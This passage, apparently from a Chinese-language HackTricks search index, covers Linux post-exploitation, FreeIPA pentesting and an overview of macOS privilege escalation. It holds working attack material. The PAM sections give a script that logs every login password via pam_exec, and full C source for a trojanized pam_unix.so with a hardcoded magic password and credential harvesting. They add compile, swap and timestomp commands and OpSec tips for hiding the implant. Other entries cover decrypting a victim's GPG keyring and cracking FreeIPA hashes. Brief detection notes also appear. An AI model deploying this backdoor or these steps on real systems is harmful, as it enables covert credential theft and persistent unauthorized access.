通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Post-Exploitation » Linux Post-Exploitation","id":"1982","title":"Linux Post-Exploitation"},"1983":{"body":"让我们配置一个 PAM 模块来记录每个用户用于登录的密码。如果你不知道什么是 PAM,请查看: PAM - Pluggable Authentication Modules For further details check the original post 。这只是一个摘要: Technique Overview: Pluggable Authentication Modules (PAM) 为在基于 Unix 的系统上管理身份验证提供了灵活性。它们可以通过自定义登录流程来增强安全性,但如果被滥用也会带来风险。本摘要概述了一种使用 PAM 捕获登录凭证的技术,以及相应的缓解策略。 Capturing Credentials: 创建了一个名为 toomanysecrets.sh 的 bash 脚本,用于记录登录尝试,捕获日期、用户名($PAM_USER)、密码(通过 stdin)以及远程主机 IP($PAM_RHOST),并将其写入 /var/log/toomanysecrets.log。 该脚本被赋予可执行权限,并通过在 PAM 配置(common-auth)中使用 pam_exec.so 模块集成,使用了静默运行并将认证令牌暴露给脚本的选项。 该方法演示了被攻陷的 Linux 主机如何被利用以隐蔽地记录凭证。 bash #!/bin/sh\\necho \\" $(date) $PAM_USER, $(cat -), From: $PAM_RHOST\\" >> /var/log/toomanysecrets.log\\nsudo touch /var/log/toomanysecrets.sh\\nsudo chmod 770 /var/log/toomanysecrets.sh\\nsudo nano /etc/pam.d/common-auth\\n# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh\\nsudo chmod 700 /usr/local/bin/toomanysecrets.sh","breadcrumbs":"Linux Post-Exploitation » Sniffing Logon Passwords with PAM","id":"1983","title":"Sniffing Logon Passwords with PAM"},"1984":{"body":"更多细节请查看 original post 。下面只是一个摘要: Pluggable Authentication Module (PAM) 是 Linux 下用于用户认证的系统。它基于三个主要概念: username , password , 和 service 。每个 service 的配置文件位于 /etc/pam.d/ 目录中,共享库负责处理认证。 目标 :修改 PAM,使其接受一个特定的密码进行认证,从而绕过实际用户密码。这里主要针对 pam_unix.so 共享库,该库由 common-auth 文件调用,而 common-auth 被几乎所有用于密码验证的 services 所包含。","breadcrumbs":"Linux Post-Exploitation » 在 PAM 中植入后门","id":"1984","title":"在 PAM 中植入后门"},"1985":{"body":"定位 Authentication 指令 在 common-auth 文件中: 负责检查用户密码的那一行会调用 pam_unix.so。 修改源代码 : 在 pam_unix_auth.c 源文件中添加一个条件判断:如果使用了预定义的密码则授予访问权限,否则按常规认证流程继续。 重新编译并替换 修改后的 pam_unix.so 库到相应目录。 测试 : 使用预定义密码可以在多种服务(login, ssh, sudo, su, screensaver)上获得访问权限,而正常的认证流程保持不受影响。 tip 你可以使用 https://github.com/zephrax/linux-pam-backdoor 
来自动化此过程","breadcrumbs":"Linux Post-Exploitation » 修改 pam_unix.so 的步骤:","id":"1985","title":"修改 pam_unix.so 的步骤:"},"1986":{"body":"如果你发现一个被加密的 .gpg 文件并且找到了用户的 ~/.gnupg 文件夹(pubring, private-keys, trustdb),但由于 GnuPG homedir 的权限/锁定无法解密,可以将 keyring 复制到一个可写的位置并将其作为你的 GPG home 使用。 在没有这样做时你通常会看到的错误有:\\"unsafe ownership on homedir\\", \\"failed to create temporary file\\", 或 \\"decryption failed: No secret key\\"(因为 GPG 无法读/写原始 homedir)。 工作流程: bash # 1) Stage a writable homedir and copy the victim\'s keyring\\nmkdir -p /dev/shm/fakehome/.gnupg\\ncp -r /home/victim/.gnupg/* /dev/shm/fakehome/.gnupg/\\n# 2) Ensure ownership & perms are sane for gnupg\\nchown -R $(id -u):$(id -g) /dev/shm/fakehome/.gnupg\\nchmod 700 /dev/shm/fakehome/.gnupg\\n# 3) Decrypt using the relocated homedir (either flag works)\\nGNUPGHOME=/dev/shm/fakehome/.gnupg gpg -d /home/victim/backup/secrets.gpg\\n# or\\ngpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg 如果秘密密钥材料存在于 private-keys-v1.d 中,GPG 将在不提示输入 passphrase 的情况下解锁并解密(或者如果密钥受保护则会提示)。","breadcrumbs":"Linux Post-Exploitation » 通过重定位 homedir 解密 GPG loot","id":"1986","title":"通过重定位 homedir 解密 GPG loot"},"1987":{"body":"0xdf – HTB Environment (GPG homedir relocation to decrypt loot) GnuPG Manual – Home directory and GNUPGHOME tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Post-Exploitation » 参考资料","id":"1987","title":"参考资料"},"1988":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 
加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » PAM - Pluggable Authentication Modules","id":"1988","title":"PAM - Pluggable Authentication Modules"},"1989":{"body":"PAM (Pluggable Authentication Modules) 作为一种安全机制, 验证试图访问计算机服务的用户身份 ,根据各种标准控制他们的访问。它类似于数字门卫,确保只有授权用户可以使用特定服务,同时可能限制他们的使用以防止系统过载。 配置文件 Solaris 和基于 UNIX 的系统 通常使用位于 /etc/pam.conf 的中央配置文件。 Linux 系统 更倾向于目录方法,将特定服务的配置存储在 /etc/pam.d 中。例如,登录服务的配置文件位于 /etc/pam.d/login。 登录服务的 PAM 配置示例如下: auth required /lib/security/pam_securetty.so\\nauth required /lib/security/pam_nologin.so\\nauth sufficient /lib/security/pam_ldap.so\\nauth required /lib/security/pam_unix_auth.so try_first_pass\\naccount sufficient /lib/security/pam_ldap.so\\naccount required /lib/security/pam_unix_acct.so\\npassword required /lib/security/pam_cracklib.so\\npassword required /lib/security/pam_ldap.so\\npassword required /lib/security/pam_pwdb.so use_first_pass\\nsession required /lib/security/pam_unix_session.so PAM 管理领域 这些领域或管理组包括 auth 、 account 、 password 和 session ,每个领域负责身份验证和会话管理过程的不同方面: Auth :验证用户身份,通常通过提示输入密码。 Account :处理账户验证,检查诸如组成员资格或时间限制等条件。 Password :管理密码更新,包括复杂性检查或字典攻击防护。 Session :管理服务会话开始或结束时的操作,例如挂载目录或设置资源限制。 PAM 模块控制 控制决定模块对成功或失败的响应,影响整体身份验证过程。这些包括: Required :所需模块的失败最终导致失败,但仅在检查所有后续模块后。 Requisite :失败时立即终止过程。 Sufficient :成功绕过同一领域的其余检查,除非后续模块失败。 Optional :仅在它是堆栈中唯一模块时导致失败。 示例场景 在具有多个身份验证模块的设置中,过程遵循严格的顺序。如果 pam_securetty 模块发现登录终端未授权,则阻止 root 登录,但由于其“required”状态,所有模块仍会被处理。pam_env 设置环境变量,可能有助于用户体验。pam_ldap 和 pam_unix 模块协同工作以验证用户,pam_unix 尝试使用先前提供的密码,从而提高身份验证方法的效率和灵活性。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » 基本信息","id":"1989","title":"基本信息"},"199":{"body":"LDAP 是一种协议,允许通过 TCP/IP 管理和访问目录信息。它支持查询和修改目录信息的各种操作。主要用于访问和维护分布式目录信息服务,允许与为 LDAP 通信设计的数据库进行交互。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » LDAP 
(轻量级目录访问协议)","id":"199","title":"LDAP (轻量级目录访问协议)"},"1990":{"body":"在高价值的 Linux 环境中,一个经典的持久性技巧是 用木马化的替代品替换合法的 PAM 库 。因为每次 SSH / 控制台登录最终都会调用 pam_unix.so:pam_sm_authenticate(),几行 C 代码就足以捕获凭据或实现 magic 密码绕过。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » 后门 PAM – 钩住 pam_unix.so","id":"1990","title":"后门 PAM – 钩住 pam_unix.so"},"1991":{"body":"c #define _GNU_SOURCE\\n#include \\n#include \\n#include \\n#include \\n#include static int (*orig)(pam_handle_t *, int, int, const char **);\\nstatic const char *MAGIC = \\"Sup3rS3cret!\\"; int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {\\nconst char *user, *pass;\\npam_get_user(pamh, &user, NULL);\\npam_get_authtok(pamh, PAM_AUTHTOK, &pass, NULL); /* Magic pwd → immediate success */\\nif(pass && strcmp(pass, MAGIC) == 0) return PAM_SUCCESS; /* Credential harvesting */\\nint fd = open(\\"/usr/bin/.dbus.log\\", O_WRONLY|O_APPEND|O_CREAT, 0600);\\ndprintf(fd, \\"%s:%s\\\\n\\", user, pass);\\nclose(fd); /* Fall back to original function */\\nif(!orig) {\\norig = dlsym(RTLD_NEXT, \\"pam_sm_authenticate\\");\\n}\\nreturn orig(pamh, flags, argc, argv);\\n} 编译和隐蔽替换: bash gcc -fPIC -shared -o pam_unix.so trojan_pam.c -ldl -lpam\\nmv /lib/security/pam_unix.so /lib/security/pam_unix.so.bak\\nmv pam_unix.so /lib/security/pam_unix.so\\nchmod 644 /lib/security/pam_unix.so # keep original perms\\ntouch -r /bin/ls /lib/security/pam_unix.so # timestomp","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » 编译备忘单","id":"1991","title":"编译备忘单"},"1992":{"body":"原子覆盖 – 写入临时文件并 mv 到目标位置,以避免半写入的库锁定 SSH。 日志文件放置如 /usr/bin/.dbus.log 与合法桌面工件混合。 保持符号导出相同 (pam_sm_setcred 等),以避免 PAM 错误行为。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » OpSec Tips","id":"1992","title":"OpSec Tips"},"1993":{"body":"比较 pam_unix.so 的 MD5/SHA256 与发行版包。 检查 /lib/security/ 下的可全局写入或不寻常的所有权。 auditd 规则: -w /lib/security/pam_unix.so -p wa -k 
pam-backdoor。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » Detection","id":"1993","title":"Detection"},"1994":{"body":"https://hotpotato.tistory.com/434 Palo Alto Unit42 – Infiltration of Global Telecom Networks tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Post-Exploitation » PAM - Pluggable Authentication Modules » References","id":"1994","title":"References"},"1995":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"FreeIPA Pentesting » FreeIPA Pentesting","id":"1995","title":"FreeIPA Pentesting"},"1996":{"body":"FreeIPA 是一个开源的 替代方案 ,用于 Microsoft Windows Active Directory ,主要针对 Unix 环境。它结合了完整的 LDAP 目录 和 MIT Kerberos 密钥分发中心,管理方式类似于 Active Directory。利用 Dogtag 证书系统 进行 CA 和 RA 证书管理,支持 多因素 认证,包括智能卡。SSSD 集成用于 Unix 认证过程。","breadcrumbs":"FreeIPA Pentesting » 基本信息","id":"1996","title":"基本信息"},"1997":{"body":"","breadcrumbs":"FreeIPA Pentesting » 指纹","id":"1997","title":"指纹"},"1998":{"body":"文件 /etc/krb5.conf 存储 Kerberos 客户端信息,这是加入域所必需的。这包括 KDC 和管理员服务器的位置、默认设置和映射。 IPA 客户端和服务器的系统范围默认设置在文件 /etc/ipa/default.conf 中设置。 域内的主机必须在 /etc/krb5.keytab 处拥有 krb5.keytab 文件以进行认证过程。 各种环境变量(KRB5CCNAME、KRB5_KTNAME、KRB5_CONFIG、KRB5_KDC_PROFILE、KRB5RCACHETYPE、KRB5RCACHEDIR、KRB5_TRACE、KRB5_CLIENT_KTNAME、KPROP_PORT)用于指向与 Kerberos 认证相关的特定文件和设置。","breadcrumbs":"FreeIPA Pentesting » 文件和环境变量","id":"1998","title":"文件和环境变量"},"1999":{"body":"工具如 ipa、kdestroy、kinit、klist、kpasswd、ksu、kswitch 和 kvno 是管理 FreeIPA 域、处理 Kerberos 票证、修改密码和获取服务票证等功能的关键。","breadcrumbs":"FreeIPA Pentesting » 二进制文件","id":"1999","title":"二进制文件"},"2":{"body":"","breadcrumbs":"HackTricks » 企业赞助商","id":"2","title":"企业赞助商"},"20":{"body":"Copyright © 保留所有权利,除非另有说明。 License Summary: Attribution: 你可以自由地: Share — 以任何媒介或格式复制和重新分发材料。 Adapt — 混合、转变并基于材料进行创作。 Additional Terms: Third-Party Content: 本博客/书籍的某些部分可能包含来自其他来源的内容,例如其他博客或出版物的摘录。使用此类内容是基于合理使用原则或获得相关版权持有者的明确许可。请参阅原始来源以获取有关第三方内容的具体许可信息。 Authorship: HackTricks创作的原始内容受此许可条款的约束。鼓励在分享或改编时将此作品归功于作者。 Exemptions: Commercial Use: 有关此内容商业使用的查询,请与我联系。 此许可不授予与内容相关的任何商标或品牌权利。所有在本博客/书籍中出现的商标和品牌均为其各自所有者的财产。 通过访问或使用HackTricks,你同意遵守此许可的条款。如果你不同意这些条款,请不要访问此网站。","breadcrumbs":"HackTricks Values & FAQ » LICENSE","id":"20","title":"LICENSE"},"200":{"body":"Active Directory 是一个可通过网络访问的数据库,包含用户、组、权限和资源等对象,促进网络实体的集中管理。AD 将其数据组织成域的层次结构,可以包含服务器、组和用户。子域允许进一步细分,每个子域可能维护自己的服务器和用户基础。该结构集中管理用户,授予或限制对网络资源的访问。可以进行查询以检索特定信息,如联系信息,或在域内查找资源,如打印机。 tip 学习和实践 AWS 黑客技术: 
HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » Active Directory (AD)","id":"200","title":"Active Directory (AD)"},"2000":{"body":"提供了一幅插图,描绘了典型的 FreeIPA 服务器设置。","breadcrumbs":"FreeIPA Pentesting » 网络","id":"2000","title":"网络"},"2001":{"body":"FreeIPA 中的认证利用 Kerberos ,与 Active Directory 中的认证相似。访问域资源需要有效的 Kerberos 票证,具体存储位置取决于 FreeIPA 域配置。","breadcrumbs":"FreeIPA Pentesting » 认证","id":"2001","title":"认证"},"2002":{"body":"CCACHE 文件通常存储在 /tmp 中,权限为 600 ,是用于存储 Kerberos 凭据的二进制格式,重要的是可以在没有用户明文密码的情况下进行认证。可以使用 klist 命令解析 CCACHE 票证,重新使用有效的 CCACHE 票证涉及将 KRB5CCNAME 导出到票证文件的路径。","breadcrumbs":"FreeIPA Pentesting » CCACHE 票证文件","id":"2002","title":"CCACHE 票证文件"},"2003":{"body":"另外,CCACHE 票证可以存储在 Linux 密钥环中,提供对票证管理的更多控制。票证存储的范围各异(KEYRING:name、KEYRING:process:name、KEYRING:thread:name、KEYRING:session:name、KEYRING:persistent:uidnumber),klist 能够为用户解析这些信息。然而,从 Unix 密钥环重新使用 CCACHE 票证可能会面临挑战,像 Tickey 这样的工具可用于提取 Kerberos 票证。","breadcrumbs":"FreeIPA Pentesting » Unix 密钥环","id":"2003","title":"Unix 密钥环"},"2004":{"body":"密钥表文件包含 Kerberos 主体和加密密钥,对于在不需要主体密码的情况下获取有效的票证授予票(TGT)至关重要。可以使用 klist 等实用程序和 KeytabParser 等脚本轻松解析和重新使用密钥表文件中的凭据。","breadcrumbs":"FreeIPA Pentesting » 密钥表","id":"2004","title":"密钥表"},"2005":{"body":"您可以在以下链接中找到有关如何在 Linux 中使用票证的更多信息: Linux Active Directory","breadcrumbs":"FreeIPA Pentesting » 备忘单","id":"2005","title":"备忘单"},"2006":{"body":"warning 您可以通过 ldap 和其他 二进制 工具进行 枚举 ,或 连接到 FreeIPA 服务器的 443 端口的网页 。","breadcrumbs":"FreeIPA Pentesting » 枚举","id":"2006","title":"枚举"},"2007":{"body":"可以创建 主机 、 用户 和 组 。主机和用户被分类到称为“ 主机组 ”和“ 用户组 ”的容器中。这些类似于 组织单位 (OU)。 在 FreeIPA 中,LDAP 服务器默认允许 匿名绑定 ,大量数据可以 未经身份验证 进行枚举。这可以枚举所有可用的未经身份验证的数据: 
ldapsearch -x 要获取 更多信息 ,您需要使用 经过身份验证 的会话(请查看身份验证部分以了解如何准备经过身份验证的会话)。 bash # Get all users of domain\\nldapsearch -Y gssapi -b \\"cn=users,cn=compat,dc=domain_name,dc=local\\" # Get users groups\\nldapsearch -Y gssapi -b \\"cn=groups,cn=accounts,dc=domain_name,dc=local\\" # Get all the hosts\\nldapsearch -Y gssapi -b \\"cn=computers,cn=accounts,dc=domain_name,dc=local\\" # Get hosts groups\\nldapsearch -Y gssapi -b \\"cn=hostgroups,cn=accounts,dc=domain_name,dc=local\\" 从域加入的机器上,您将能够使用 已安装的二进制文件 来枚举域: bash ipa user-find\\nipa usergroup-find\\nipa host-find\\nipa host-group-find ------------------- ipa user-show --all\\nipa usergroup-show --all\\nipa host-find --all\\nipa hostgroup-show --all tip FreeIPA 的 admin 用户相当于 AD 中的 domain admins 。","breadcrumbs":"FreeIPA Pentesting » 主机、用户和组","id":"2007","title":"主机、用户和组"},"2008":{"body":"IPA server 的 root 用户可以访问密码 hashes 。 用户的密码 hash 存储为 base64 在 “ userPassword ” attribute 中。这个 hash 可能是 SSHA512 (旧版本的 FreeIPA)或 PBKDF2_SHA256 。 如果系统与 AD 有 integration ,则密码的 Nthash 存储为 base64 在 “ ipaNTHash ” 中。 要破解这些 hashes: • 如果 freeIPA 与 AD 集成, ipaNTHash 很容易破解:你应该 decode base64 -> 重新编码为 ASCII hex -> John The Ripper 或 hashcat 可以帮助你快速破解 • 如果使用的是旧版本的 FreeIPA,则使用 SSHA512 :你应该解码 base64 -> 找到 SSHA512 hash -> John The Ripper 或 hashcat 可以帮助你破解 • 如果使用的是新版本的 FreeIPA,则使用 PBKDF2_SHA256 :你应该解码 base64 -> 找到 PBKDF2_SHA256 -> 它的 length 是 256 字节。John 可以处理 256 位(32 字节)-> SHA-265 用作伪随机函数,块大小为 32 字节 -> 你可以只使用我们的 PBKDF2_SHA256 hash 的前 256 位 -> John The Ripper 或 hashcat 可以帮助你破解 要提取 hashes,你需要在 FreeIPA server 中是 root ,在那里你可以使用工具 dbscan 来提取它们:","breadcrumbs":"FreeIPA Pentesting » Hashes","id":"2008","title":"Hashes"},"2009":{"body":"这些规则授予用户或主机对资源(主机、服务、服务组等)的特定权限。 bash # Enumerate using ldap\\nldapsearch -Y gssapi -b \\"cn=hbac,dc=domain_name,dc=local\\"\\n# Using ipa\\nipa hbacrule-find\\n# Show info of rule\\nipa hbacrule-show --all Sudo-Rules FreeIPA 通过 sudo-rules 实现对 sudo 权限 的集中控制。这些规则允许或限制在域内主机上使用 sudo 执行命令。攻击者可以通过检查这些规则集来识别适用的主机、用户和允许的命令。 bash # Enumerate 
using ldap\\nldapsearch -Y gssapi -b \\"cn=sudorules,cn=sudo,dc=domain_name,dc=local\\"\\n# Using ipa\\nipa sudorule-find\\n# Show info of rule\\nipa sudorule-show --all","breadcrumbs":"FreeIPA Pentesting » HBAC-Rules","id":"2009","title":"HBAC-Rules"},"201":{"body":"Reading time: 21 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » Nmap 摘要 (ESP)","id":"201","title":"Nmap 摘要 (ESP)"},"2010":{"body":"一个 角色 由各种 特权 组成,每个特权包含一组 权限 。这些角色可以分配给用户、用户 组 、 主机 、主机组和服务。例如,考虑 FreeIPA 中的默认“用户管理员”角色来说明这个结构。 角色 User Administrator 拥有以下特权: 用户管理员 组管理员 阶段用户管理员 使用以下命令可以枚举角色、特权和权限: bash # Using ldap\\nldapsearch -Y gssapi -b \\"cn=roles,cn=accounts,dc=westeros,dc=local\\"\\n# Using ipa binary\\nipa role-find\\nipa role-show --all\\nipa privilege-find\\nipa privilege-show --all\\nipa permission-find\\nipa permission-show --all","breadcrumbs":"FreeIPA Pentesting » 基于角色的访问控制","id":"2010","title":"基于角色的访问控制"},"2011":{"body":"在 https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405b5b95e 中,您可以找到一个简单的示例,说明如何滥用某些权限来妥协域。","breadcrumbs":"FreeIPA Pentesting » 攻击场景示例","id":"2011","title":"攻击场景示例"},"2012":{"body":"https://github.com/Orange-Cyberdefense/LinikatzV2 https://github.com/CiscoCXSecurity/linikatz","breadcrumbs":"FreeIPA Pentesting » Linikatz/LinikatzV2","id":"2012","title":"Linikatz/LinikatzV2"},"2013":{"body":"","breadcrumbs":"FreeIPA Pentesting » 权限提升","id":"2013","title":"权限提升"},"2014":{"body":"warning 如果您可以 创建一个名为 root 的新用户 ,您可以冒充他并能够 以 root 身份 SSH 进入任何机器。 这已经被修补。 您可以在 https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b 
中查看详细说明。","breadcrumbs":"FreeIPA Pentesting » root 用户创建","id":"2014","title":"root 用户创建"},"2015":{"body":"https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1 https://www.youtube.com/watch?v=9dOu-7BTwPQ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"FreeIPA Pentesting » 参考文献","id":"2015","title":"参考文献"},"2016":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS 安全与权限提升","id":"2016","title":"macOS 安全与权限提升"},"2017":{"body":"如果你对 macOS 不熟悉,你应该开始学习 macOS 的基础知识: 特殊的 macOS 文件与权限: macOS Files, Folders, Binaries & Memory 常见的 macOS 用户 macOS Users & External Accounts AppleFS macOS AppleFS 内核 的 架构 macOS Kernel & System Extensions 常见的 macOS n 网络服务与协议 macOS Network Services & Protocols 开源 macOS: https://opensource.apple.com/ 要下载 tar.gz,将 URL 更改为 https://opensource.apple.com/ source /dyld/ 到 https://opensource.apple.com/ tarballs /dyld/ dyld-852.2.tar.gz","breadcrumbs":"macOS Security & Privilege Escalation » 基础 MacOS","id":"2017","title":"基础 MacOS"},"2018":{"body":"在公司中, macOS 系统很可能会被 MDM 管理 。因此,从攻击者的角度来看,了解 其工作原理 是很有趣的: macOS MDM","breadcrumbs":"macOS Security & Privilege Escalation » MacOS MDM","id":"2018","title":"MacOS MDM"},"2019":{"body":"macOS Apps - Inspecting, debugging and Fuzzing","breadcrumbs":"macOS Security & Privilege Escalation » MacOS - 检查、调试和模糊测试","id":"2019","title":"MacOS - 检查、调试和模糊测试"},"202":{"body":"","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 参数","id":"202","title":"参数"},"2020":{"body":"macOS Security Protections","breadcrumbs":"macOS Security & Privilege Escalation » MacOS 安全保护","id":"2020","title":"MacOS 安全保护"},"2021":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » 攻击面","id":"2021","title":"攻击面"},"2022":{"body":"如果 以 root 身份运行的进程写入 一个可以被用户控制的文件,用户可能会利用这一点来 提升权限 。 这可能发生在以下情况下: 使用的文件已经由用户创建(由用户拥有) 使用的文件因组而可被用户写入 使用的文件位于用户拥有的目录中(用户可以创建该文件) 使用的文件位于 root 拥有的目录中,但用户因组而具有写入权限(用户可以创建该文件) 能够 创建一个将被 root 使用的文件 ,允许用户 利用其内容 ,甚至创建 符号链接/硬链接 指向另一个地方。 对于这种漏洞,不要忘记 检查易受攻击的 .pkg 安装程序 : macOS Installers Abuse","breadcrumbs":"macOS Security & Privilege Escalation » 文件权限","id":"2022","title":"文件权限"},"2023":{"body":"通过文件扩展名注册的奇怪应用程序可能会被滥用,不同的应用程序可以注册以打开特定协议 macOS File Extension & URL scheme app handlers","breadcrumbs":"macOS Security & Privilege Escalation » 文件扩展名与 URL 
方案应用处理程序","id":"2023","title":"文件扩展名与 URL 方案应用处理程序"},"2024":{"body":"在 macOS 中, 应用程序和二进制文件可以拥有 访问文件夹或设置的权限,使其比其他应用程序更具特权。 因此,想要成功攻陷 macOS 机器的攻击者需要 提升其 TCC 权限 (甚至 绕过 SIP ,具体取决于其需求)。 这些权限通常以 应用程序签名的权利 形式授予,或者应用程序可能请求某些访问权限,在 用户批准后 ,它们可以在 TCC 数据库 中找到。进程获得这些权限的另一种方式是成为具有这些 权限 的进程的 子进程 ,因为它们通常是 继承的 。 请访问这些链接以找到不同的方式 在 TCC 中提升权限 ,以 绕过 TCC 和过去 如何绕过 SIP 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS TCC / SIP 权限提升","id":"2024","title":"macOS TCC / SIP 权限提升"},"2025":{"body":"当然,从红队的角度来看,你也应该对提升到 root 感兴趣。查看以下帖子以获取一些提示: macOS Privilege Escalation","breadcrumbs":"macOS Security & Privilege Escalation » macOS 传统权限提升","id":"2025","title":"macOS 传统权限提升"},"2026":{"body":"https://github.com/usnistgov/macos_security","breadcrumbs":"macOS Security & Privilege Escalation » macOS 合规性","id":"2026","title":"macOS 合规性"},"2027":{"body":"OS X 事件响应:脚本和分析 https://taomm.org/vol1/analysis.html https://github.com/NicolasGrimonpont/Cheatsheet https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ https://www.youtube.com/watch?v=vMGiplQtjTY tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » 参考文献","id":"2027","title":"参考文献"},"2028":{"body":"Reading time: 32 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
